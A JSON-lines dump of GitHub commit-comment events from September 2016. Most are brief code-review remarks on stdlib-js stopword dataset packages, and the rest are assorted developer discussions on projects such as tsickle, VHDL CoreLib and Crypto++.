{"id":"4590953746","type":"CommitCommentEvent","actor":{"login":"jorgearanda"},"repo":{"name":"gvwilson/shuttleworth2016"},"payload":{"comment":{"id":19099785,"position":null,"line":null,"path":null,"commit_id":"5dcfd0cf2e468e8f9278c02f1f0d7f58c6976dcd","created_at":"2016-09-20T16:50:08Z","updated_at":"2016-09-20T16:50:08Z","body":"Excellent; much clearer 👍 . Good luck!"}},"created_at":"2016-09-20T16:50:08Z"}
{"id":"4590954252","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099786,"position":3,"line":3,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-it/README.md","commit_id":"123016c7c03182fb0d87d27b56a7919c50f1360a","created_at":"2016-09-20T16:50:12Z","updated_at":"2016-09-20T16:50:12Z","body":"Remove number."}},"created_at":"2016-09-20T16:50:12Z"}
{"id":"4590954800","type":"CommitCommentEvent","actor":{"login":"skiadas"},"repo":{"name":"PanthR/panthrLang"},"payload":{"comment":{"id":19099788,"position":70,"line":280,"path":"panthrLang/evaluate.js","commit_id":"d54de3a3ec3521744e2d057a0a8678d12c443e39","created_at":"2016-09-20T16:50:17Z","updated_at":"2016-09-20T16:50:17Z","body":"Hey @bwahl this doesnt look quite right."}},"created_at":"2016-09-20T16:50:17Z"}
{"id":"4590955218","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099792,"position":64,"line":64,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-it/README.md","commit_id":"123016c7c03182fb0d87d27b56a7919c50f1360a","created_at":"2016-09-20T16:50:22Z","updated_at":"2016-09-20T16:50:22Z","body":"Add licensing info."}},"created_at":"2016-09-20T16:50:22Z"}
{"id":"4590956327","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099805,"position":5,"line":5,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-it/datapackage.json","commit_id":"123016c7c03182fb0d87d27b56a7919c50f1360a","created_at":"2016-09-20T16:50:34Z","updated_at":"2016-09-20T16:50:34Z","body":"Remove number."}},"created_at":"2016-09-20T16:50:34Z"}
{"id":"4590956845","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099807,"position":10,"line":10,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-it/datapackage.json","commit_id":"123016c7c03182fb0d87d27b56a7919c50f1360a","created_at":"2016-09-20T16:50:40Z","updated_at":"2016-09-20T16:50:40Z","body":"See above."}},"created_at":"2016-09-20T16:50:40Z"}
{"id":"4590957448","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099808,"position":20,"line":20,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-it/datapackage.json","commit_id":"123016c7c03182fb0d87d27b56a7919c50f1360a","created_at":"2016-09-20T16:50:47Z","updated_at":"2016-09-20T16:50:47Z","body":"See above."}},"created_at":"2016-09-20T16:50:47Z"}
{"id":"4590958842","type":"CommitCommentEvent","actor":{"login":"hess-g"},"repo":{"name":"angular/tsickle"},"payload":{"comment":{"id":19099817,"position":null,"line":null,"path":null,"commit_id":"4d068cca8b21bdacdc506ae41f130369e73949bc","created_at":"2016-09-20T16:51:02Z","updated_at":"2016-09-20T16:51:02Z","body":"@evmar - Should the fixes for #180 and #199 rename their source files to d.ts for consistency? "}},"created_at":"2016-09-20T16:51:02Z"}
{"id":"4590958941","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099818,"position":10,"line":10,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-it/lib/index.js","commit_id":"123016c7c03182fb0d87d27b56a7919c50f1360a","created_at":"2016-09-20T16:51:03Z","updated_at":"2016-09-20T16:51:03Z","body":"Single quotes."}},"created_at":"2016-09-20T16:51:03Z"}
{"id":"4590959998","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099820,"position":4,"line":4,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-it/package.json","commit_id":"123016c7c03182fb0d87d27b56a7919c50f1360a","created_at":"2016-09-20T16:51:14Z","updated_at":"2016-09-20T16:51:14Z","body":"Remove number."}},"created_at":"2016-09-20T16:51:14Z"}
{"id":"4590960204","type":"CommitCommentEvent","actor":{"login":"ma3a"},"repo":{"name":"bezgerts/Handshakes"},"payload":{"comment":{"id":19099822,"position":14,"line":15,"path":"src/main/java/HandshakeThread.java","commit_id":"22689f41d0494d820f8aadad0276292324a5d8eb","created_at":"2016-09-20T16:51:17Z","updated_at":"2016-09-20T16:51:17Z","body":"А зачем CopyOnWriteArrayList, у тебя же каждый отдельный поток имеет свой экземпляр? вот если бы он он у тебя был как `static` тогда уже потребовался"}},"created_at":"2016-09-20T16:51:17Z"}
{"id":"4590960607","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099825,"position":30,"line":30,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-it/package.json","commit_id":"123016c7c03182fb0d87d27b56a7919c50f1360a","created_at":"2016-09-20T16:51:20Z","updated_at":"2016-09-20T16:51:20Z","body":"Remove value."}},"created_at":"2016-09-20T16:51:20Z"}
{"id":"4590962479","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19099831,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T16:51:41Z","updated_at":"2016-09-20T16:51:41Z","body":"I've just implemented the [second try](http://aa.quae.nl/en/reken/juliaansedag.html#13_2_3).\r\n\r\nIt's better than the first one but it fails on '-4528/2/29':\r\n\r\n```\r\n by `jd_to_gregorian4`: 67301 |    -4528/3/1 (must be -4528/2/29) o\r\n by `jd_to_gregorian3`: 67301 |   -4528/2/29 (must be -4528/2/29) +\r\nby `jd_to_gregorian2`:  67301 |   -4528/2/29 (must be -4528/2/29) +\r\n by `jd_to_gregorian`:  67301 |   -4528/2/28 (must be -4528/2/29) o\r\n```\r\n\r\n† `jd_to_gregorian4` is the new implementation."}},"created_at":"2016-09-20T16:51:41Z"}
{"id":"4590963184","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099834,"position":30,"line":30,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-sp/LICENSE","commit_id":"2aeb0cdc4266c15587c91a8831d8626e6a1042cd","created_at":"2016-09-20T16:51:49Z","updated_at":"2016-09-20T16:51:49Z","body":"Apache-2.0"}},"created_at":"2016-09-20T16:51:49Z"}
{"id":"4590963610","type":"CommitCommentEvent","actor":{"login":"perpetualjourney"},"repo":{"name":"akoncius/wasabi"},"payload":{"comment":{"id":19099837,"position":null,"line":null,"path":null,"commit_id":"ef3adb20eae37f4311307527da2f8fb9f5f5016a","created_at":"2016-09-20T16:51:54Z","updated_at":"2016-09-20T16:51:54Z","body":"👍 thanks!"}},"created_at":"2016-09-20T16:51:54Z"}
{"id":"4590964677","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099841,"position":3,"line":3,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-sp/README.md","commit_id":"2aeb0cdc4266c15587c91a8831d8626e6a1042cd","created_at":"2016-09-20T16:52:05Z","updated_at":"2016-09-20T16:52:05Z","body":"Remove number."}},"created_at":"2016-09-20T16:52:05Z"}
{"id":"4590966199","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099848,"position":63,"line":63,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-sp/README.md","commit_id":"2aeb0cdc4266c15587c91a8831d8626e6a1042cd","created_at":"2016-09-20T16:52:21Z","updated_at":"2016-09-20T16:52:21Z","body":"Add licensing info."}},"created_at":"2016-09-20T16:52:21Z"}
{"id":"4590966896","type":"CommitCommentEvent","actor":{"login":"whiskeyromeo"},"repo":{"name":"whiskeyromeo/CommunityQuestionAnswering"},"payload":{"comment":{"id":19099857,"position":128,"line":128,"path":"vomitRepo/whiskeyPrimer2.py","commit_id":"a4e48129d57cf471fd7f81be7fbcc07096055079","created_at":"2016-09-20T16:52:27Z","updated_at":"2016-09-20T16:52:27Z","body":"or are you referencing the python serialization package pickle?"}},"created_at":"2016-09-20T16:52:27Z"}
{"id":"4590967041","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099859,"position":5,"line":5,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-sp/datapackage.json","commit_id":"2aeb0cdc4266c15587c91a8831d8626e6a1042cd","created_at":"2016-09-20T16:52:29Z","updated_at":"2016-09-20T16:52:29Z","body":"Remove number."}},"created_at":"2016-09-20T16:52:29Z"}
{"id":"4590967624","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099861,"position":10,"line":10,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-sp/datapackage.json","commit_id":"2aeb0cdc4266c15587c91a8831d8626e6a1042cd","created_at":"2016-09-20T16:52:35Z","updated_at":"2016-09-20T16:52:35Z","body":"Remove number."}},"created_at":"2016-09-20T16:52:35Z"}
{"id":"4590968159","type":"CommitCommentEvent","actor":{"login":"wildanarifanani"},"repo":{"name":"wildanarifanani/Aplikasi-Pencatatan-Service-Motor"},"payload":{"comment":{"id":19099864,"position":null,"line":null,"path":null,"commit_id":"d156937a6879b9b7c681cde6042979b912845e81","created_at":"2016-09-20T16:52:41Z","updated_at":"2016-09-20T16:52:41Z","body":"Aplikasi Pencatatan Service Motor Di Bengkel Motor Surya Cimahi"}},"created_at":"2016-09-20T16:52:41Z"}
{"id":"4590968168","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099865,"position":20,"line":20,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-sp/datapackage.json","commit_id":"2aeb0cdc4266c15587c91a8831d8626e6a1042cd","created_at":"2016-09-20T16:52:41Z","updated_at":"2016-09-20T16:52:41Z","body":"Remove number."}},"created_at":"2016-09-20T16:52:41Z"}
{"id":"4590969184","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099871,"position":45,"line":45,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-sp/datapackage.json","commit_id":"2aeb0cdc4266c15587c91a8831d8626e6a1042cd","created_at":"2016-09-20T16:52:52Z","updated_at":"2016-09-20T16:52:52Z","body":"Invalid SPDX identifier."}},"created_at":"2016-09-20T16:52:52Z"}
{"id":"4590970500","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099877,"position":10,"line":10,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-sp/lib/index.js","commit_id":"2aeb0cdc4266c15587c91a8831d8626e6a1042cd","created_at":"2016-09-20T16:53:06Z","updated_at":"2016-09-20T16:53:06Z","body":"Single quotes."}},"created_at":"2016-09-20T16:53:06Z"}
{"id":"4590971229","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099878,"position":4,"line":4,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-sp/package.json","commit_id":"2aeb0cdc4266c15587c91a8831d8626e6a1042cd","created_at":"2016-09-20T16:53:14Z","updated_at":"2016-09-20T16:53:14Z","body":"Remove number."}},"created_at":"2016-09-20T16:53:14Z"}
{"id":"4590972008","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099881,"position":30,"line":30,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-sp/package.json","commit_id":"2aeb0cdc4266c15587c91a8831d8626e6a1042cd","created_at":"2016-09-20T16:53:21Z","updated_at":"2016-09-20T16:53:21Z","body":"Remove value."}},"created_at":"2016-09-20T16:53:21Z"}
{"id":"4590975879","type":"CommitCommentEvent","actor":{"login":"timj"},"repo":{"name":"lsst/pipe_tasks"},"payload":{"comment":{"id":19099888,"position":6,"line":124,"path":"python/lsst/pipe/tasks/mocks/mockCoadd.py","commit_id":"cc60aeaf961f1859f7e83a98a2299dea6d464a15","created_at":"2016-09-20T16:53:59Z","updated_at":"2016-09-20T16:53:59Z","body":"Yes, Just saw. The fix is simple in the short term. Flip them."}},"created_at":"2016-09-20T16:53:59Z"}
{"id":"4590975884","type":"CommitCommentEvent","actor":{"login":"evmar"},"repo":{"name":"angular/tsickle"},"payload":{"comment":{"id":19099889,"position":null,"line":null,"path":null,"commit_id":"4d068cca8b21bdacdc506ae41f130369e73949bc","created_at":"2016-09-20T16:53:59Z","updated_at":"2016-09-20T16:53:59Z","body":"I guess we need to handle overloads both in .ts source and when generating externs, so you can do it either way.  The rule in tsickle (which I will document, now that I think of it) is that anything in a d.ts is equivalent to anything in a \"declare ...\" block."}},"created_at":"2016-09-20T16:53:59Z"}
{"id":"4590975946","type":"CommitCommentEvent","actor":{"login":"chaitanya5398"},"repo":{"name":"chaitanya5398/trying_only"},"payload":{"comment":{"id":19099890,"position":null,"line":null,"path":null,"commit_id":"6de884da4c8c414a8667462a3607bf5c32d19c0f","created_at":"2016-09-20T16:54:00Z","updated_at":"2016-09-20T16:54:00Z","body":"just"}},"created_at":"2016-09-20T16:54:00Z"}
{"id":"4590980568","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099911,"position":1,"line":1,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fr/LICENSE","commit_id":"89fb9efa8f3243040121d0f041d6028a502c3c0c","created_at":"2016-09-20T16:54:47Z","updated_at":"2016-09-20T16:54:47Z","body":"This is incorrect. The database and its contents are not licensed under CC0 and PDDL-1.0."}},"created_at":"2016-09-20T16:54:47Z"}
{"id":"4590980899","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19099912,"position":6,"line":33,"path":"src/math.vhdl","commit_id":"10eb07b7dd2e56a8fe88c75df39d57a4cb76c71a","created_at":"2016-09-20T16:54:50Z","updated_at":"2016-09-20T16:54:50Z","body":"What I meant was that the input shouldn't be allowed to overflow the output. If I remember correctly integer ranges are defined by the implementation but it must at least be 32 bits. Have you tested what happens if `SquareNumber` is called with `positive'high` (which I assume is > 2^31 - 1 if more than 32 bits are used by the simulator)"}},"created_at":"2016-09-20T16:54:50Z"}
{"id":"4590981348","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099913,"position":1,"line":1,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fin/LICENSE","commit_id":"89fb9efa8f3243040121d0f041d6028a502c3c0c","created_at":"2016-09-20T16:54:55Z","updated_at":"2016-09-20T16:54:55Z","body":"This is incorrect. The database and its contents are not licensed under CC0 and PDDL-1.0."}},"created_at":"2016-09-20T16:54:55Z"}
{"id":"4590983090","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099920,"position":1,"line":1,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-ger/LICENSE","commit_id":"89fb9efa8f3243040121d0f041d6028a502c3c0c","created_at":"2016-09-20T16:55:13Z","updated_at":"2016-09-20T16:55:13Z","body":"This is incorrect. The database and its contents are not licensed under CC0 and PDDL-1.0."}},"created_at":"2016-09-20T16:55:13Z"}
{"id":"4590983986","type":"CommitCommentEvent","actor":{"login":"dotsara"},"repo":{"name":"dotsara/right-now"},"payload":{"comment":{"id":19099922,"position":7,"line":7,"path":"javascript/time.js","commit_id":"61a18f5fe92537354d6447e58e5fd097c290fc04","created_at":"2016-09-20T16:55:22Z","updated_at":"2016-09-20T16:55:22Z","body":"Not shown here is `currentlyDayOfTheYear` because as I'm discovering, getting the day of the year (#) is tricky business. So many options!"}},"created_at":"2016-09-20T16:55:22Z"}
{"id":"4590984407","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099923,"position":1,"line":1,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-it/LICENSE","commit_id":"89fb9efa8f3243040121d0f041d6028a502c3c0c","created_at":"2016-09-20T16:55:26Z","updated_at":"2016-09-20T16:55:26Z","body":"This is incorrect. The database and its contents are not licensed under CC0 and PDDL-1.0."}},"created_at":"2016-09-20T16:55:26Z"}
{"id":"4590986179","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099926,"position":1,"line":1,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-por/LICENSE","commit_id":"89fb9efa8f3243040121d0f041d6028a502c3c0c","created_at":"2016-09-20T16:55:44Z","updated_at":"2016-09-20T16:55:44Z","body":"This is incorrect. The database and its contents are not licensed under CC0 and PDDL-1.0."}},"created_at":"2016-09-20T16:55:44Z"}
{"id":"4590987324","type":"CommitCommentEvent","actor":{"login":"iapazmino"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19099928,"position":3,"line":3,"path":"glossary.md","commit_id":"03386263dfdc6a081212ee26a2767ad9ef8350d2","created_at":"2016-09-20T16:55:55Z","updated_at":"2016-09-20T16:55:55Z","body":"Yeah, we are no t using it. Removing."}},"created_at":"2016-09-20T16:55:55Z"}
{"id":"4590987447","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099929,"position":1,"line":1,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-sp/LICENSE","commit_id":"89fb9efa8f3243040121d0f041d6028a502c3c0c","created_at":"2016-09-20T16:55:56Z","updated_at":"2016-09-20T16:55:56Z","body":"This is incorrect. The database and its contents are not licensed under CC0 and PDDL-1.0."}},"created_at":"2016-09-20T16:55:56Z"}
{"id":"4590988442","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"xdevs23/android_frameworks_base-xos7-aosp"},"payload":{"comment":{"id":19099930,"position":null,"line":null,"path":null,"commit_id":"859456c9ac92372942ecf768908efc795f682393","created_at":"2016-09-20T16:56:04Z","updated_at":"2016-09-20T16:56:04Z","body":"Do we even have this stuff tho?\r\nI do not think so."}},"created_at":"2016-09-20T16:56:04Z"}
{"id":"4590988883","type":"CommitCommentEvent","actor":{"login":"Mysterium"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19099931,"position":null,"line":null,"path":null,"commit_id":"7e19227245fc63508f1f4fcfc1a83583abb3f7da","created_at":"2016-09-20T16:56:08Z","updated_at":"2016-09-20T16:56:08Z","body":"This allow players to use commands with gm level 0 like .save or .acc "}},"created_at":"2016-09-20T16:56:08Z"}
{"id":"4590989181","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099932,"position":1,"line":1,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-swe/LICENSE","commit_id":"89fb9efa8f3243040121d0f041d6028a502c3c0c","created_at":"2016-09-20T16:56:11Z","updated_at":"2016-09-20T16:56:11Z","body":"This is incorrect. The database and its contents are not licensed under CC0 and PDDL-1.0."}},"created_at":"2016-09-20T16:56:11Z"}
{"id":"4590992426","type":"CommitCommentEvent","actor":{"login":"glestaris"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":19099938,"position":26,"line":168,"path":"image_puller/unpacker/namespaced_cmd_linux.go","commit_id":"29c04d6ac0472daab9916223e7d14ded8c8d712f","created_at":"2016-09-20T16:56:44Z","updated_at":"2016-09-20T16:56:44Z","body":"That would make sense. Is `chug.Chug` blocking?"}},"created_at":"2016-09-20T16:56:44Z"}
{"id":"4590993012","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099939,"position":3,"line":3,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fin/README.md","commit_id":"f813310ffad30dbe664a674ebcedf781cc9d4f77","created_at":"2016-09-20T16:56:49Z","updated_at":"2016-09-20T16:56:49Z","body":"Remove number."}},"created_at":"2016-09-20T16:56:49Z"}
{"id":"4590994043","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099941,"position":62,"line":62,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fin/README.md","commit_id":"f813310ffad30dbe664a674ebcedf781cc9d4f77","created_at":"2016-09-20T16:57:00Z","updated_at":"2016-09-20T16:57:00Z","body":"Add license info."}},"created_at":"2016-09-20T16:57:00Z"}
{"id":"4590994869","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099942,"position":5,"line":5,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fin/datapackage.json","commit_id":"f813310ffad30dbe664a674ebcedf781cc9d4f77","created_at":"2016-09-20T16:57:08Z","updated_at":"2016-09-20T16:57:08Z","body":"Remove number."}},"created_at":"2016-09-20T16:57:08Z"}
{"id":"4590995668","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099946,"position":10,"line":10,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fin/datapackage.json","commit_id":"f813310ffad30dbe664a674ebcedf781cc9d4f77","created_at":"2016-09-20T16:57:16Z","updated_at":"2016-09-20T16:57:16Z","body":"See above."}},"created_at":"2016-09-20T16:57:16Z"}
{"id":"4590995860","type":"CommitCommentEvent","actor":{"login":"mfaywu"},"repo":{"name":"mfaywu/job-search-tool"},"payload":{"comment":{"id":19099947,"position":null,"line":null,"path":null,"commit_id":"da93a89a33749511b0a87979b5ea4c16e0f4e5a9","created_at":"2016-09-20T16:57:17Z","updated_at":"2016-09-20T16:57:17Z","body":"The best guide I have found to spawn and expect so far:\r\n[http://www.thegeekstuff.com/2010/10/expect-examples](url)"}},"created_at":"2016-09-20T16:57:17Z"}
{"id":"4590996260","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099949,"position":20,"line":20,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fin/datapackage.json","commit_id":"f813310ffad30dbe664a674ebcedf781cc9d4f77","created_at":"2016-09-20T16:57:21Z","updated_at":"2016-09-20T16:57:21Z","body":"See above."}},"created_at":"2016-09-20T16:57:21Z"}
{"id":"4590997282","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099953,"position":45,"line":45,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fin/datapackage.json","commit_id":"f813310ffad30dbe664a674ebcedf781cc9d4f77","created_at":"2016-09-20T16:57:31Z","updated_at":"2016-09-20T16:57:31Z","body":"Invalid SPDX."}},"created_at":"2016-09-20T16:57:31Z"}
{"id":"4590998312","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099955,"position":10,"line":10,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fin/lib/index.js","commit_id":"f813310ffad30dbe664a674ebcedf781cc9d4f77","created_at":"2016-09-20T16:57:41Z","updated_at":"2016-09-20T16:57:41Z","body":"Single quotes."}},"created_at":"2016-09-20T16:57:41Z"}
{"id":"4590998519","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19099956,"position":null,"line":null,"path":null,"commit_id":"5e687ecb677558faa30332d76a4dcb7a1d00569d","created_at":"2016-09-20T16:57:43Z","updated_at":"2016-09-20T16:57:43Z","body":"Also see [Integer union removal and Integer dev-branch testing](http://groups.google.com/forum/#!topic/cryptopp-users/uVdM4bwxCFk). It details the history of this change.\r\n\r\nAn example of the hang is [Issue 31: BlumBlumShub validation fails under ARMEL (likely others)](http://github.com/weidai11/cryptopp/issues/31). We also experienced similar trouble on other non-mainstream platforms, and the trouble moved around as both the code and compiler changed.\r\n\r\nAnd see the related [Issue 274: Solaris, integer.cpp and \"Types cannot be declared in anonymous union\"](http://github.com/weidai11/cryptopp/issues/274)."}},"created_at":"2016-09-20T16:57:43Z"}
{"id":"4590998996","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099959,"position":4,"line":4,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fin/package.json","commit_id":"f813310ffad30dbe664a674ebcedf781cc9d4f77","created_at":"2016-09-20T16:57:48Z","updated_at":"2016-09-20T16:57:48Z","body":"Remove number."}},"created_at":"2016-09-20T16:57:48Z"}
{"id":"4590999588","type":"CommitCommentEvent","actor":{"login":"tmeissner"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19099961,"position":null,"line":null,"path":null,"commit_id":"470271f2a77e92625142dc1cd99c01e16e08d19d","created_at":"2016-09-20T16:57:54Z","updated_at":"2016-09-20T16:57:54Z","body":"* Yeah, I have some kind of an `iter` method to iterate over all keys in the dictionary implementation in my libvhdl. You mean something in that way I assume.\r\n* A `copy` procedure is a good hint, would be outside of the protected type like my merge procedure.\r\n* `pop` without key means that you get a random key/value pair? Should be possible to also realize this if needed."}},"created_at":"2016-09-20T16:57:54Z"}
{"id":"4590999792","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099962,"position":30,"line":30,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fin/package.json","commit_id":"f813310ffad30dbe664a674ebcedf781cc9d4f77","created_at":"2016-09-20T16:57:56Z","updated_at":"2016-09-20T16:57:56Z","body":"Remove value."}},"created_at":"2016-09-20T16:57:56Z"}
{"id":"4591002496","type":"CommitCommentEvent","actor":{"login":"MARTINSEGURADOMINGUEZ"},"repo":{"name":"MARTINSEGURADOMINGUEZ/ModuloCitaConAutoridades"},"payload":{"comment":{"id":19099969,"position":5,"line":209,"path":"app/src/main/java/com/example/martin/modulocitaconautoridades/MainActivity.java","commit_id":"479caa639f228b44262943140b92e40b8e0982b7","created_at":"2016-09-20T16:58:23Z","updated_at":"2016-09-20T16:58:23Z","body":"Esta bien con esto se queda...."}},"created_at":"2016-09-20T16:58:23Z"}
{"id":"4591002553","type":"CommitCommentEvent","actor":{"login":"sils1297"},"repo":{"name":"Dawny33/coala-bears"},"payload":{"comment":{"id":19099970,"position":50,"line":198,"path":"README.rst","commit_id":"2de026621f70a470a52043a4a045440ff7d30ded","created_at":"2016-09-20T16:58:23Z","updated_at":"2016-09-20T16:58:23Z","body":"Copy paste error, you removed the bears?"}},"created_at":"2016-09-20T16:58:23Z"}
{"id":"4591002738","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099972,"position":1,"line":1,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fin/LICENSE","commit_id":"f813310ffad30dbe664a674ebcedf781cc9d4f77","created_at":"2016-09-20T16:58:25Z","updated_at":"2016-09-20T16:58:25Z","body":"Addressed incorrectly in a subsequent commit."}},"created_at":"2016-09-20T16:58:25Z"}
{"id":"4591004900","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099978,"position":1,"line":1,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-swe/LICENSE","commit_id":"c73280090e1ff7e8fcaace2fe195b4a9216c4d3c","created_at":"2016-09-20T16:58:47Z","updated_at":"2016-09-20T16:58:47Z","body":"Addressed incorrectly in a subsequent commit."}},"created_at":"2016-09-20T16:58:47Z"}
{"id":"4591008246","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099986,"position":3,"line":3,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-swe/README.md","commit_id":"c73280090e1ff7e8fcaace2fe195b4a9216c4d3c","created_at":"2016-09-20T16:59:18Z","updated_at":"2016-09-20T16:59:18Z","body":"Remove number."}},"created_at":"2016-09-20T16:59:18Z"}
{"id":"4591009227","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099987,"position":63,"line":63,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-swe/README.md","commit_id":"c73280090e1ff7e8fcaace2fe195b4a9216c4d3c","created_at":"2016-09-20T16:59:28Z","updated_at":"2016-09-20T16:59:28Z","body":"Add license info."}},"created_at":"2016-09-20T16:59:28Z"}
